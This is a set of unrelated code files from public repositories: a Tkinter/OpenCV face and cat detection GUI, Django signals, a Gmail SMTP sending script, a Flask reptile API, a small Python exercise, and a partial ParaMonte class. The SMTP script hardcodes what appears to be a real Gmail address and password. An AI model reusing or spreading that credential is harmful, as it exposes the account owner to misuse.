image=eyeIcon, width=120,\r\n compound=LEFT, command=lambda: self.detect_button_click(self.isDetectEyes, 'isDetectEyes', self.buttonEyes))\r\n self.buttonFace = Button(\r\n detectButtonsFrame, text=\"Face\", image=faceIcon, width=120,\r\n compound=LEFT, command=lambda: self.detect_button_click(self.isDetectFace, 'isDetectFace', self.buttonFace))\r\n self.buttonSmile = Button(\r\n detectButtonsFrame, text=\"Smile\", image=smileIcon, width=120,\r\n compound=LEFT, command=lambda: self.detect_button_click(self.isDetectSmile, 
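            # the attribute name is passed as a string so detect_button_click can toggle the flag via setattr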
'isDetectSmile', self.buttonSmile))\r\n self.buttonCat = Button(\r\n detectButtonsFrame, text=\"Cats\", image=catIcon, width=120,\r\n compound=LEFT, command=lambda: self.detect_button_click(self.isDetectCat, 'isDetectCat', self.buttonCat))\r\n\r\n # MISC BUTTONS\r\n self.buttonSnapShot = Button(\r\n snapshotButtonsFrame, text=\"SnapShot\", image=captureIcon, width=140, state=DISABLED,\r\n compound=LEFT, command=lambda: SaveSnapShotWindow(self.root, self.filteredFrame))\r\n self.buttonStop = Button(\r\n snapshotButtonsFrame, text=\"Stop\", image=stopIcon, width=140,\r\n compound=LEFT, command=self.stop_playing)\r\n\r\n # BUTTON LAYOUT\r\n Label(buttonsFrame, text=\"Pick a Source\").grid(\r\n row=0, column=0, pady=10)\r\n self.buttonUseWebCam.grid(row=1, column=0, padx=5, pady=5)\r\n self.buttonUploadVideo.grid(row=1, column=1, padx=5, pady=5)\r\n self.buttonUploadImage.grid(row=1, column=2, padx=5, pady=5)\r\n\r\n Label(buttonsFrame, text=\"Pick a Detection\").grid(\r\n row=2, column=0, pady=10)\r\n self.buttonEyes.grid(row=0, column=0, padx=5, pady=5)\r\n self.buttonFace.grid(row=1, column=0, padx=5, pady=5)\r\n self.buttonSmile.grid(row=0, column=1, padx=5, pady=5)\r\n self.buttonCat.grid(row=1, column=1, padx=5, pady=5)\r\n\r\n Label(buttonsFrame, text=\"Misc\").grid(\r\n row=4, column=0, pady=10)\r\n self.buttonSnapShot.grid(row=0, column=0, padx=5, pady=5)\r\n self.buttonStop.grid(row=0, column=1, padx=5, pady=5)\r\n\r\n # DISPLAY DEFAULT IMAGE UPON LAUNCH OR WHEN STOP BUTTON IS PRESSED\r\n self.labelImage.configure(image=self.defaultFrameImage)\r\n\r\n # CUSTOMIZE THE \"X\" BUTTON OF A WINDOW TO CLOSE IT WITHOUT ERROR\r\n # When the user pressed the X button on a window, this function will suspend all running functions before closing/destroying the window\r\n self.root.protocol(\"WM_DELETE_WINDOW\", lambda: (\r\n self.stop_playing(), self.root.destroy()))\r\n\r\n self.root.mainloop()\r\n\r\n def start_webcam(self):\r\n # Stop Everything if there is any\r\n self.stop_playing()\r\n\r\n # State that the program is using the Web Cam as source\r\n self.isUsingWebCam = True\r\n self.isPlayingVideo = False\r\n self.isImageSelected = False\r\n self.buttonUseWebCam.configure(state=DISABLED)\r\n self.buttonSnapShot.configure(state=NORMAL)\r\n\r\n # Opens the Web cam\r\n self.webCamCapture = cv2.VideoCapture(0, cv2.CAP_DSHOW)\r\n\r\n self.cycle_frames()\r\n\r\n def upload_image(self):\r\n # Stop Everything if there is any\r\n self.stop_playing()\r\n\r\n # Spawns a window to choose a file, if a file was not selected the function will stop\r\n filePath = filedialog.askopenfilename(title=\"Select image file\", filetypes=(\r\n (\"jpg files\", \"*.jpg\"), (\"all files\", \"*.*\")))\r\n if filePath == \"\":\r\n return\r\n # Convert / path to \\\\ for Windows to be able to read\r\n self.convertedFilePath = filePath.replace('/', \"\\\\\\\\\")\r\n\r\n # State that the program is using an Image as source\r\n self.isImageSelected = True\r\n self.isUsingWebCam = False\r\n self.isPlayingVideo = False\r\n self.buttonSnapShot.configure(state=NORMAL)\r\n\r\n self.cycle_frames()\r\n\r\n def upload_video(self):\r\n # Stop Everything if there is any\r\n self.stop_playing()\r\n\r\n # Spawns a window to choose a file, if a file was not selected the function will stop\r\n filePath = filedialog.askopenfilename(title=\"Select video file\", filetypes=(\r\n (\"mp4 files\", \"*.mp4\"), (\"all files\", \"*.*\")))\r\n if filePath == \"\":\r\n return\r\n\r\n # Convert / path to \\\\ for Windows to be able to read\r\n 
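        # backslash-separated paths are the Windows convention cv2 expects here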
convertedFilePath = filePath.replace('/', \"\\\\\\\\\")\r\n\r\n self.video = cv2.VideoCapture(convertedFilePath)\r\n\r\n # State that the program is using a Video as source\r\n self.isUsingWebCam = False\r\n self.isPlayingVideo = True\r\n self.isImageSelected = False\r\n self.buttonSnapShot.configure(state=NORMAL)\r\n\r\n self.cycle_frames()\r\n\r\n def detect_button_click(self, buttonState, instanceName, button):\r\n if buttonState:\r\n # Sets the button to be Unpressed\r\n setattr(self, instanceName, False)\r\n button.config(relief=RAISED)\r\n\r\n else:\r\n # Sets the button to be Pressed\r\n setattr(self, instanceName, True)\r\n button.config(relief=SUNKEN)\r\n\r\n # Conditional statement for when an Image is the source, every click of the button updates the image\r\n if ((not self.isUsingWebCam) & (not self.isPlayingVideo)):\r\n if self.isImageSelected:\r\n self.cycle_frames()\r\n\r\n def cycle_frames(self):\r\n if self.isPlayingVideo | self.isUsingWebCam:\r\n while True:\r\n ret = 0\r\n if self.isUsingWebCam:\r\n ret, frame = self.webCamCapture.read()\r\n # Flips the webcam output to act like a mirror\r\n frame = cv2.flip(frame, 1)\r\n\r\n if self.isPlayingVideo:\r\n ret, frame = self.video.read()\r\n\r\n if not ret: # Stops the while loop when the video/webcam has no more frames or have been stopped\r\n break\r\n #\r\n self.show_image_on_label(frame)\r\n\r\n if self.isImageSelected:\r\n self.image = cv2.imread(self.convertedFilePath)\r\n self.show_image_on_label(self.image)\r\n\r\n def show_image_on_label(self, frame):\r\n # Apply the boxes and convert the image from BGR to RGB\r\n # This is the variable that will be used when clicking the snapshot button\r\n self.filteredFrame = self.detection_applier(frame)\r\n cv2image = cv2.cvtColor(self.filteredFrame, cv2.COLOR_BGR2RGB)\r\n\r\n # Converts CV2 image to PIL image that tkinter can read\r\n img_update = ImageTk.PhotoImage(Image.fromarray(cv2image))\r\n\r\n # Configure the label to show the PIL image in it\r\n self.labelImage.configure(image=img_update)\r\n self.labelImage.image = img_update\r\n self.labelImage.update()\r\n\r\n def detection_applier(self, frame):\r\n gray = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)\r\n\r\n # Configs of when drawing a text on the frames/images\r\n font = cv2.FONT_HERSHEY_SIMPLEX\r\n fontScale = 0.7\r\n fontBold = 2\r\n\r\n faceCascade = cv2.CascadeClassifier(\r\n f\"{cv2.data.haarcascades}haarcascade_frontalface_default.xml\")\r\n eyeCascade = cv2.CascadeClassifier(\r\n f\"{cv2.data.haarcascades}haarcascade_eye.xml\")\r\n smileCascade = cv2.CascadeClassifier(\r\n f\"{cv2.data.haarcascades}haarcascade_smile.xml\")\r\n catFaceCascade = cv2.CascadeClassifier(\r\n f\"{cv2.data.haarcascades}haarcascade_frontalcatface.xml\")\r\n\r\n if (self.isDetectFace):\r\n # WHEN A FACE IS DETECTED, ONLY THE EYES AND SMILE IN THE FACE ROI WILL BE BOXED\r\n detectedFaces = faceCascade.detectMultiScale(gray, 1.3, 5)\r\n for (x, y, w, h) in detectedFaces:\r\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\r\n cv2.putText(frame, 'Face', (x, y), font,\r\n fontScale, (0, 255, 0), fontBold)\r\n\r\n # Region of Interest of the Face\r\n roi_gray = gray[y:y+h, x:x+w]\r\n roi_color = frame[y:y+h, x:x+w]\r\n\r\n if self.isDetectEyes:\r\n eyes = eyeCascade.detectMultiScale(roi_gray, 1.3, 25)\r\n for (ex, ey, ew, eh) in eyes:\r\n cv2.rectangle(roi_color, (ex, ey),\r\n (ex+ew, ey+eh), (0, 0, 255), 2)\r\n cv2.putText(roi_color, 'Eyes', (ex, ey),\r\n font, fontScale, (0, 0, 255), fontBold)\r\n\r\n if self.isDetectSmile:\r\n 
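                    # search for smiles only inside the detected face region of interest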
smiles = smileCascade.detectMultiScale(\r\n roi_gray, 1.8, 25)\r\n for (sx, sy, sw, sh) in smiles:\r\n cv2.rectangle(roi_color, (sx, sy),\r\n ((sx + sw), (sy + sh)), (255, 0, 0), 2)\r\n cv2.putText(roi_color, 'Smile', (sx, sy),\r\n font, fontScale, (255, 0, 0), fontBold)\r\n\r\n if (self.isDetectEyes & (not self.isDetectFace)):\r\n\r\n detectedEyes = eyeCascade.detectMultiScale(gray, 1.3, 25)\r\n for (x, y, w, h) in detectedEyes:\r\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 0, 255), 2)\r\n cv2.putText(frame, 'Eyes', (x, y),\r\n font, fontScale, (0, 0, 255), fontBold)\r\n\r\n if (self.isDetectSmile & (not self.isDetectFace)):\r\n\r\n detectedSmiles = smileCascade.detectMultiScale(gray, 1.8, 20)\r\n for (x, y, w, h) in detectedSmiles:\r\n cv2.rectangle(frame, (x, y), (x+w, y+h), (225, 0, 0), 2)\r\n cv2.putText(frame, 'Smile', (x, y),\r\n font, fontScale, (255, 0, 0), fontBold)\r\n\r\n if self.isDetectCat:\r\n\r\n detectedCats = catFaceCascade.detectMultiScale(gray, 1.3, 5)\r\n for (x, y, w, h) in detectedCats:\r\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 102, 255), 2)\r\n cv2.putText(frame, 'Cat', (x, y),\r\n font, fontScale, (0, 102, 255), fontBold)\r\n\r\n return frame\r\n\r\n def stop_playing(self):\r\n # Releases either the webcam of the video source\r\n if self.isUsingWebCam:\r\n self.webCamCapture.release()\r\n if self.isPlayingVideo:\r\n self.video.release()\r\n\r\n # Set the default image on the image canvas\r\n self.labelImage.configure(image=self.defaultFrameImage)\r\n\r\n # Change button states accordingly\r\n self.isUsingWebCam = False\r\n self.isPlayingVideo = False\r\n self.isImageSelected = False\r\n self.buttonSnapShot.configure(state=DISABLED)\r\n self.buttonUseWebCam.configure(state=NORMAL)\r\n\r\n\r\nclass SaveSnapShotWindow:\r\n def __init__(self, root, filteredFrame) -> None:\r\n self.saveWindow = Toplevel(root)\r\n self.saveWindow.title(\"Save SnapShot\")\r\n self.saveWindow.resizable(False, False)\r\n self.saveWindow.option_add(\"*font\", \"Arial 12\")\r\n\r\n # IMAGE/VIDEO CANVAS\r\n self.imageFrame = Frame(self.saveWindow)\r\n self.labelImage = Label(self.imageFrame)\r\n self.imageFrame.pack()\r\n self.labelImage.grid(row=0, column=0, padx=10, pady=10)\r\n\r\n # SEPARATE FRAMES FOR THE BUTTONS AND TEXT FIELD\r\n changeFileNameFrame = Frame(self.saveWindow)\r\n changeFileNameFrame.pack()\r\n buttonFrame = Frame(self.saveWindow)\r\n buttonFrame.pack()\r\n\r\n # TEXTFIELD FOR THE FILE NAME\r\n self.entryboxSaveAs = Entry(changeFileNameFrame, width=25)\r\n labelFileExtension = Label(changeFileNameFrame, text=\".jpg\")\r\n\r\n # SAVE AND CANCEL BUTTONS\r\n self.buttonSave = Button(\r\n buttonFrame, text=\"Save\", command=self.save, bg='#4764ff', fg='white', width=15, height=1)\r\n self.buttonCancel = Button(\r\n buttonFrame, text=\"Cancel\", command=self.close_window_or_cancel, bg='#3c3c3c', fg='white', width=15, height=1)\r\n\r\n # TEXTFIELD AND BUTTONS LAYOUT\r\n Label(changeFileNameFrame, text=\"Set Filename:\").grid(row=0, column=0)\r\n self.entryboxSaveAs.grid(row=1, column=0)\r\n labelFileExtension.grid(row=1, column=1, sticky=W)\r\n self.buttonSave.grid(row=0, column=1, padx=20, pady=10)\r\n self.buttonCancel.grid(row=0, column=0, padx=20, pady=10)\r\n #\r\n #\r\n # SHOW THE IMAGE ON THE IMAGE CANVAS\r\n self.snapShotImage = filteredFrame\r\n self.show_image_on_label(self.snapShotImage)\r\n\r\n # GETS THE CURRENT TIME AND PLACE IT IN THE TEXTFIELD AS A DEFAULT FILE NAME\r\n self.timeString = datetime.datetime.now().strftime('%Y_%m_%d_%H_%M_%S')\r\n 
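        # pre-fill the filename entry; save() falls back to this timestamp if the field is left empty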
self.entryboxSaveAs.insert(INSERT, self.timeString)\r\n\r\n # GRABS THE FOCUS ON THIS WINDOW SO THAT THE MAIN WINDOW CANNOT BE PRESSED UNTIL THIS WINDOW IS CLOSED\r\n self.saveWindow.grab_set()\r\n\r\n # MODIFIED THE X BUTTON FOR A SAFE CLOSE\r\n self.saveWindow.protocol(\r\n \"WM_DELETE_WINDOW\", self.close_window_or_cancel)\r\n\r\n def save(self):\r\n # Gets the file name from the textbox\r\n saveAsFileName = self.entryboxSaveAs.get()\r\n\r\n # If the user did not type any name, it will default to the current time\r\n if saveAsFileName == \"\":\r\n saveAsFileName = self.timeString\r\n\r\n # Writes/Saves the image that was passed through the class not the downscale thumbnail/image\r\n cv2.imwrite(f'./snapshots/{saveAsFileName}.jpg', self.snapShotImage)\r\n\r\n self.close_window_or_cancel()\r\n\r\n def close_window_or_cancel(self):\r\n self.saveWindow.grab_release()\r\n # Safely destroy the toplevel without affecting the root window\r\n self.saveWindow.destroy()\r\n\r\n def show_image_on_label(self, frame):\r\n # Apply the boxes and convert the image from BGR to RGB\r\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\r\n cv2image = self.downscale_image(cv2image)\r\n\r\n # Converts CV2 image to PIL image that tkinter can read\r\n img_update = ImageTk.PhotoImage(Image.fromarray(cv2image))\r\n\r\n # Configure the label to show the PIL image in it\r\n self.labelImage.configure(image=img_update)\r\n self.labelImage.image = img_update\r\n self.labelImage.update()\r\n\r\n def downscale_image(self, image):\r\n scale_percent = 70 # Resize the image to n%\r\n width = int(image.shape[1] * scale_percent / 100)\r\n height = int(image.shape[0] * scale_percent / 100)\r\n dim = (width, height)\r\n\r\n # Return the resized image\r\n return cv2.resize(image, dim, interpolation=cv2.INTER_AREA)\r\n\r\n\r\nroot = tk.Tk()\r\nMainGUI(root)\r\n","repo_name":"Mark-A14/haarscade-with-tkinter-gui","sub_path":"finalProject.py","file_name":"finalProject.py","file_ext":"py","file_size_in_byte":18205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"17418816337","text":"from django.db.models.signals import pre_save, post_save\nfrom django.dispatch import receiver\n\nfrom product.utils import unique_slug_generator\nfrom product.models.datamodel import Incoming, Outgoing\n\n\n\n@receiver(pre_save, sender=Incoming)\ndef product_pre_save_slug(sender, instance, *args, **kwargs):\n if not instance.slug:\n instance.slug = unique_slug_generator(instance)\n \n\n\n@receiver(post_save, sender=Outgoing)\ndef update_incoming(sender, instance, **kwargs):\n product_instance = Incoming.objects.get(pk=instance.product.id)\n print(product_instance.name)\n product_instance.stock = 'Sold'\n \n product_instance.save()\n ","repo_name":"milanalay/AkalaRecondition","sub_path":"product/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23948928527","text":"import smtplib\r\nfrom email.mime.text import MIMEText\r\nfrom email.header import 
Header\r\n\r\nsmtp=smtplib.SMTP(\"smtp.gmail.com\",587)\r\nsmtp.ehlo()\r\nsmtp.starttls()\r\nsmtp.login(\"yujunlee7862@gmail.com\",\"dkgur3@@\")\r\n\r\nm=\"yujunlee7862@gmail.com\"\r\ny=\"yujunlee7862@gmail.com\"\r\nsubject=\"hellow\"\r\nmessage=\"dd\"\r\nmsg=MIMEText(message.encode('utf-8'),_subtype='plain',_charset='utf-8')\r\nmsg['Subject']=Header(subject.encode('utf-8'),'utf-8')\r\nmsg['From']=m\r\nmsg['To']=y\r\nsmtp.sendmail(m, y, msg.as_string())\r\nsmtp.quit()\r\n","repo_name":"yujunlee12/gmail","sub_path":"ㅇ.py","file_name":"ㅇ.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"18528546394","text":"# Challenge 50:\n# Write a program that reads SIX INTEGERS\n# and shows the sum of only those that were EVEN. If the\n# value entered is ODD, ignore it.\n\nsoma = 0\ncont = 0\nfor c in range(1, 7):\n    num = int(input('Enter the {}º number: '.format(c)))\n    if num % 2 == 0:\n        soma += num\n        cont += 1\nprint('You entered {} EVEN number(s) and the sum was {}.'.format(cont, soma))\n","repo_name":"wmarenga/Python_Learning","sub_path":"Basic_Python_course_Course_in_video/Mundo2_python3/Exercicio50.py","file_name":"Exercicio50.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"10322470052","text":"from flask import (Blueprint, request)\nfrom . import models\n\nbp = Blueprint('reptile', __name__, url_prefix=\"/reptiles\")\n\n@bp.route('/', methods=['POST', 'GET'])\ndef index():\n    # Return Reptiles Index\n    if request.method == 'GET':\n        reptiles_dict = {\n            'reptiles': []\n        }\n        # find all reptiles\n        reptiles = models.Reptile.query.all()\n        for row in reptiles:\n            # JSON friendly dict format\n            row_dict = {\n                'id': row.id,\n                'common_name': row.common_name,\n                'scientific_name': row.scientific_name,\n                'conservation_status': row.conservation_status,\n                'native_habitat': row.native_habitat,\n                'fun_fact': row.fun_fact\n            }\n            reptiles_dict['reptiles'].append(row_dict)\n        return reptiles_dict\n\n    # Add New Reptile\n    elif request.method == 'POST':\n        new_reptile = models.Reptile(\n            common_name = request.form['common_name'],\n            scientific_name = request.form['scientific_name'],\n            conservation_status = request.form['conservation_status'],\n            native_habitat = request.form['native_habitat'],\n            fun_fact = request.form['fun_fact']\n        )\n        # JSON friendly dict format\n        new_reptile_dict = {\n            'common_name': request.form['common_name'],\n            'scientific_name': request.form['scientific_name'],\n            'conservation_status': request.form['conservation_status'],\n            'native_habitat': request.form['native_habitat'],\n            'fun_fact': request.form['fun_fact']\n        }\n        # Add New Reptile to Database\n        models.db.session.add(new_reptile)\n        models.db.session.commit()\n\n        # Print dictionary object on console and return on postman\n        print(new_reptile_dict)\n        return(new_reptile_dict)\n\n\n@bp.route('/<int:id>')\ndef show(id):\n    reptile = models.Reptile.query.filter_by(id=id).first()\n    reptile_dict = {\n        'common_name': reptile.common_name,\n        'scientific_name': reptile.scientific_name,\n        'conservation_status': reptile.conservation_status,\n        'native_habitat': reptile.native_habitat,\n        'fun_fact': reptile.fun_fact\n    }\n    return 
reptile_dict","repo_name":"skim1127/Ball-Py-API","sub_path":"ballpy/reptile.py","file_name":"reptile.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6812576739","text":"import dash\nfrom dash import html, dcc\nimport dash_bootstrap_components as dbc\n\ndash.register_page(__name__, path='/')\n\n\nselect_existing = dbc.Col(\n html.Div(\n [\n html.H2(\"Select existing dataset\"),\n html.Hr(className=\"my-2\"),\n html.P(\n \"Use a previously onboarded dataset to run the topic modeling pipeline.\"\n ),\n dbc.Button(\"Go\", color=\"dark\", outline=True, href='/tm_data_selection'),\n ],\n className=\"h-100 p-4 m-1 border rounded-3\",\n ),\n md=6,\n)\n\nonboard_new = dbc.Col(\n html.Div(\n [\n html.H2(\"Onboard new data\"),\n html.Hr(className=\"my-2\"),\n html.P(\n \"Add a new corpus to the data registry.\"\n ),\n dbc.Button(\"Go\", color=\"dark\", outline=True, href='/')\n \n ],\n className=\"h-100 p-4 m-1 border rounded-3\",\n ),\n md=6,\n)\n\nhome_selection = dbc.Row(\n [select_existing, onboard_new],\n className=\"align-items-md-stretch\",\n style={\"margin-left\":\"3%\",\"margin-right\":\"3%\" }\n)\n\nlayout = html.Div(children=[\n home_selection\n])\n\n","repo_name":"DHARPA-Project/kiara_plugin.playground","sub_path":"examples/apps/dash/pages/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43671365687","text":"import string\nimport zipfile\nimport random\n\n\ndef check_sum():\n with open('rows.txt') as file:\n lines = file.readlines()\n sum_num = 0\n for line in lines:\n row = line.split('\\t')\n row = [int(i) for i in row]\n diff = max(row) - min(row)\n sum_num = sum_num + diff\n print(sum_num)\n return sum_num\n\n\ncheck_sum()\n\n\ndef read_zip_file():\n files = zipfile.ZipFile('zadanie_1_words.zip')\n\n for txt in files.infolist():\n single_file = files.open(txt)\n line_list = str(single_file.readlines())\n\n line_list = line_list.lower()\n print(line_list)\n signs = string.ascii_lowercase\n for sign in signs:\n amount_of_sign = line_list.count(sign)\n print(sign, amount_of_sign)\n\n\nread_zip_file()\n\n\ndef rock_paper_scissors():\n choice = ('r', 'p', 's')\n user_choice = 0\n comp_won = 0\n user_won = 0\n\n while user_choice != 'no':\n user_choice = (input('Choose a play sign: (R)ock,(P)aper, (S)cissors or (No) if you want to close the game: '))\n user_choice = user_choice.lower()\n if user_choice == 'no':\n break\n\n comp_choice = random.choice(choice)\n print(user_choice)\n print(comp_choice)\n if user_choice == 'r' and comp_choice == 's' or user_choice == 's' and comp_choice == 'p' or user_choice == 'p' and comp_choice == 'r':\n print('+' + '-' * 10 + '+')\n print('| ' + 'You won!' + ' |')\n print('+' + '-' * 10 + '+')\n user_won += 1\n print('Current result: You {}:{} Computer'.format(user_won, comp_won))\n\n elif user_choice == 'r' and comp_choice == 'r' or user_choice == 's' and comp_choice == 's' or user_choice == 'p' and comp_choice == 'p':\n print('+' + '-' * 7 + '+')\n print('| ' + 'Draw!' + ' |')\n print('+' + '-' * 7 + '+')\n\n elif user_choice == 's' and comp_choice == 'r' or user_choice == 'p' and comp_choice == 's' or user_choice == 'r' and comp_choice == 'p':\n print('+' + '-' * 15 + '+')\n print('| ' + 'Computer won!' 
+ ' |')\n print('+' + '-' * 15 + '+')\n comp_won += 1\n print('Current result: You {}:{} Computer'.format(user_won, comp_won))\n\n else:\n print('You have chose a wrong sign. Try again.')\n\n play_again = input('Do you want to play again? Write \"yes\" or \"no\".')\n play_again = play_again.lower()\n if play_again == 'yes' or play_again == 'y':\n print('=' * 80)\n elif play_again == 'no' or play_again == 'n':\n break\n\n\nrock_paper_scissors()\n\n\n\n\n\n","repo_name":"DariaBe/Prework_PfW","sub_path":"prework_isa.py","file_name":"prework_isa.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22170375995","text":"import networkx as nx\nimport matplotlib.pyplot as plt\n\n# create an emtry graph\ng = nx.Graph()\n\n# ----------------- adding nodes to graph -----------------\n# adding just one node (เพิ่ม 1 โหนด)\ng.add_node('a')\n# a list of nodes (เพิ่มโหนดแบบเป็นลิสต์, หลายโหนดทีเดียว)\ng.add_nodes_from(['b', 'c'])\ndemoNodes = ['d', 'g']\ng.add_nodes_from(demoNodes)\n# ---------------------------------------------------\n\n# ----------------- adding Edges to graph -----------------\n# จับคู่ edges\ng.add_edge(1, 2)\nedgeNo1 = ('x', 'z') # type : tuple ()\nedgeNo2 = ('p', 'q') # type : tuple ()\nedgeNo3 = [('a', 'c'), ('c', 'd'), ('a', 1), (1, 'd'), ('a', 2)] # type : list []\n# print(type(edgeNo3))\ng.add_edge(*edgeNo1)\ng.add_edge(*edgeNo2)\ng.add_edges_from(edgeNo3)\n# ---------------------------------------------------\nprint(f'nodes of graph : {g.nodes()}')\nprint(f'edges of graph : {g.edges()}')\nnx.draw(g, with_labels = True)\n\n# Save File\nplt.savefig('path_graph.png')\nplt.show()","repo_name":"Nattawut-CS/AI-Lab01","sub_path":"introduce_networkx.py","file_name":"introduce_networkx.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15819560228","text":"# coding=utf-8\nr\"\"\"Evaluation on detecting key events using a RNN.\n\"\"\"\nimport math\nimport torch\nimport numpy as np\nimport sklearn\n\nfrom datasets.dataset_splits import DATASET_TO_NUM_CLASSES\nimport utils.logging as logging\n\nlogger = logging.get_logger(__name__)\n\n\nclass VectorRegression(sklearn.base.BaseEstimator):\n \"\"\"Class to perform regression on multiple outputs.\"\"\"\n\n def __init__(self, estimator):\n self.estimator = estimator\n\n def fit(self, x, y):\n _, m = y.shape\n # Fit a separate regressor for each column of y\n self.estimators_ = [sklearn.base.clone(self.estimator).fit(x, y[:, i])\n for i in range(m)]\n return self\n\n def predict(self, x):\n # Join regressors' predictions\n res = [est.predict(x)[:, np.newaxis] for est in self.estimators_]\n return np.hstack(res)\n\n def score(self, x, y):\n # Join regressors' scores\n res = [est.score(x, y[:, i]) for i, est in enumerate(self.estimators_)]\n return np.mean(res)\n\n\ndef fit_model(train_embs, train_labels, val_embs, val_labels,\n global_step, num_classes, prefix, report_error=False):\n \"\"\"Linear Regression to regress to fraction completed.\"\"\"\n\n train_embs = np.concatenate(train_embs, axis=0)\n train_labels = np.concatenate(train_labels, axis=0)\n val_embs = np.concatenate(val_embs, axis=0)\n val_labels = np.concatenate(val_labels, axis=0)\n\n lin_model = VectorRegression(sklearn.linear_model.LinearRegression())\n lin_model.fit(train_embs, train_labels)\n\n train_score = lin_model.score(train_embs, train_labels)\n val_score = 
lin_model.score(val_embs, val_labels)\n\n return lin_model, train_score, val_score\n\ndef regression_labels_for_class(labels, class_idx):\n # Assumes labels are ordered. Find the last occurrence of particular class.\n transition_frame = np.argwhere(labels == class_idx)[-1, 0]\n return (np.arange(float(len(labels))) - transition_frame) / len(labels)\n\n\ndef get_regression_labels(class_labels, num_classes):\n regression_labels = []\n for i in range(num_classes - 1):\n regression_labels.append(regression_labels_for_class(class_labels, i))\n return np.stack(regression_labels, axis=1)\n\n\ndef get_targets_from_labels(all_class_labels, num_classes):\n all_regression_labels = []\n for class_labels in all_class_labels:\n all_regression_labels.append(get_regression_labels(class_labels,\n num_classes))\n return all_regression_labels\n\n\nclass EventCompletion(object):\n \"\"\"Predict event completion using linear regression.\"\"\"\n\n def __init__(self, cfg):\n self.cfg = cfg\n self.downstream_task = True\n\n def evaluate(self, dataset, cur_epoch, summary_writer, visualize=True):\n \"\"\"Labeled evaluation.\"\"\"\n fractions = self.cfg.EVAL.CLASSIFICATION_FRACTIONS\n\n train_embs = dataset['train_dataset']['embs']\n val_embs = dataset['val_dataset']['embs']\n num_classes = DATASET_TO_NUM_CLASSES[dataset['name']]\n\n if len(train_embs) == 0 or len(val_embs) == 0:\n raise ValueError('All embeddings are NAN. Something is wrong with model.')\n\n val_labels = get_targets_from_labels(dataset['val_dataset']['labels'],\n num_classes)\n\n num_samples = len(dataset['train_dataset']['embs'])\n val_scores = []\n for fraction in fractions:\n num_samples_used = max(1, int(fraction * num_samples))\n train_embs = dataset['train_dataset']['embs'][:num_samples_used]\n train_labels = get_targets_from_labels(\n dataset['train_dataset']['labels'][:num_samples_used], num_classes)\n model, train_score, val_score = fit_model(train_embs, train_labels, val_embs, val_labels,\n cur_epoch, num_classes, '%s_%s' % (dataset['name'], str(fraction)))\n prefix = '%s_%s' % (dataset['name'], str(fraction))\n logger.info('[Global step: {}] Event Completion {} Fraction Train '\n 'Score: {:.3f},'.format(cur_epoch, prefix, train_score))\n logger.info('[Global step: {}] Event Completion {} Fraction Val '\n 'Score: {:.3f},'.format(cur_epoch, prefix, val_score))\n summary_writer.add_scalar('event_completion/train_%s_score' % prefix,\n train_score, cur_epoch)\n summary_writer.add_scalar('event_completion/val_%s_score' % prefix,\n val_score, cur_epoch)\n val_scores.append(val_score)\n \n return val_scores[-1]\n","repo_name":"minghchen/CARL_code","sub_path":"evaluation/event_completion.py","file_name":"event_completion.py","file_ext":"py","file_size_in_byte":4672,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"48"} +{"seq_id":"41033099761","text":"# 给定一个包括 n 个整数的数组 nums 和 一个目标值 target。找出 nums 中的三个整数,使得它们的和与 target 最接近。返回这三个数的和\n# 。假定每组输入只存在唯一答案。 \n# \n# \n# \n# 示例: \n# \n# 输入:nums = [-1,2,1,-4], target = 1\n# 输出:2\n# 解释:与 target 最接近的和是 2 (-1 + 2 + 1 = 2) 。\n# \n# \n# \n# \n# 提示: \n# \n# \n# 3 <= nums.length <= 10^3 \n# -10^3 <= nums[i] <= 10^3 \n# -10^4 <= target <= 10^4 \n# \n# Related Topics 数组 双指针 \n# 👍 645 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def threeSumClosest(self, nums, target):\n res = sum(nums[:2]) + nums[-1]\n nums.sort()\n for i in range(len(nums)-2):\n l, r = i + 1, len(nums) - 1\n while l < r:\n temp = nums[i] + nums[l] + 
nums[r]\n                if abs(temp - target) < abs(res - target):\n                    res = temp\n                if temp == target:\n                    return target\n                if temp > target:\n                    r -= 1\n                else:\n                    l += 1\n        return res\n# leetcode submit region end(Prohibit modification and deletion)\n\n\na = Solution()\nprint(a.threeSumClosest([-1,2,1,-4],1))\n","repo_name":"lishx-archive/Leetcode","sub_path":"leetcode/editor/cn/[16]最接近的三数之和.py","file_name":"[16]最接近的三数之和.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13624603683","text":"import os as _os\nimport sys as _sys\n\n####################################################################################################################################\n\n# get version\n\nclass Version:\n    \"\"\"\n\n    .. py:class:: Version\n\n    This is the Version class for generating objects\n    that contain the methods for getting and dumping\n    the python-interface or kernel versions of the\n    ParaMonte library installation on the system.\n\n    **Parameters**\n\n        versionPath\n            A string containing the path to either the\n            ParaMonte kernel or interface version file.\n\n        versionType\n            A string containing the type of the version\n            file. It can be one of the following values:\n\n            \"interface\"\n                implying the Python-interface version\n                number of the ParaMonte library.\n\n            